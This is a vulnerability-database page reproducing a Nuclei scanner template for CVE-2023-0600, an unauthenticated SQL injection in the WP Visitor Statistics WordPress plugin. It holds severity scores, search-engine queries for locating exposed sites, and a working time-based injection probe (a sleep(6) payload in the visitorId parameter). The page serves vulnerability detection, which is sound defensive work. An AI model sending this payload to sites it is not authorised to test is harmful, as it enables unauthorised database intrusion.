Lucene search
ProjectDiscoveryNUCLEI:CVE-2023-0600HistoryOct 17, 2023 - 7:20 a.m.
WP Visitor Statistics (Real Time Traffic) < 6.9 - SQL Injection
2023-10-1707:20:28
ProjectDiscovery
github.com
9
wp
visitor statistics
wordpress
sql injection
unauthenticated
wpscan
plugins market
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
AI Score
Confidence
High
0.049 Low
EPSS
Percentile
92.8%
The plugin does not escape user input which is concatenated to an SQL query, allowing unauthenticated visitors to conduct SQL Injection attacks.
id: CVE-2023-0600
info:
name: WP Visitor Statistics (Real Time Traffic) < 6.9 - SQL Injection
author: r3Y3r53,j4vaovo
severity: critical
description: |
The plugin does not escape user input which is concatenated to an SQL query, allowing unauthenticated visitors to conduct SQL Injection attacks.
remediation: Fixed in version 6.9
reference:
- https://wpscan.com/vulnerability/8f46df4d-cb80-4d66-846f-85faf2ea0ec4
- https://nvd.nist.gov/vuln/detail/CVE-2023-0600
- https://github.com/truocphan/VulnBox
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-0600
cwe-id: CWE-89
epss-score: 0.04071
epss-percentile: 0.92114
cpe: cpe:2.3:a:plugins-market:wp_visitor_statistics:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: plugins-market
product: wp_visitor_statistics
framework: wordpress
shodan-query: http.html:"wp-stats-manager"
fofa-query: body="wp-stats-manager"
google-query: inurl:"/wp-content/plugins/wp-stats-manager"
public-www: /wp-content/plugins/wp-stats-manager/
tags: cve,cve2023,wp,wp-plugin,wordpress,wpscan,unauth,wp-stats-manager,sqli,plugins-market
variables:
str: '{{rand_int(100000, 999999)}}'
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Real Time Traffic'
- raw:
- |
@timeout: 30s
GET /?wmcAction=wmcTrack&siteId=34&url=test&uid=01&pid=02&visitorId={{str}}%27,sleep(6),0,0,0,0,0);--+- HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(body, "sleep(6)")'
condition: and
# digest: 4a0a0047304502202861c8403d3eb479bb492712f393950224b00196285a91cabc26cfc6df23dd99022100f972e8f4e92362995d0226f6b20acfc5a5f63de38899b1d6a1df02dc0d6349db:922c64590222798bb761d5b6d8e72950Related
nvd
nvd
CVE-2023-0600
2023-05-15 13:15:09
wpvulndb
wpvulndb
WP Visitor Statistics (Real Time Traffic) < 6.9 - Unauthenticated SQLi
2023-04-24 00:00:00
cvelist
cvelist
wpexploit
wpexploit
WP Visitor Statistics (Real Time Traffic) < 6.9 - Unauthenticated SQLi
2023-04-24 00:00:00
cve
cve
CVE-2023-0600
2023-05-15 13:15:09
prion
prion
Sql injection
2023-05-15 13:15:00
wordfence
wordfence
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
AI Score
Confidence
High
0.049 Low
EPSS
Percentile
92.8%
Related for NUCLEI:CVE-2023-0600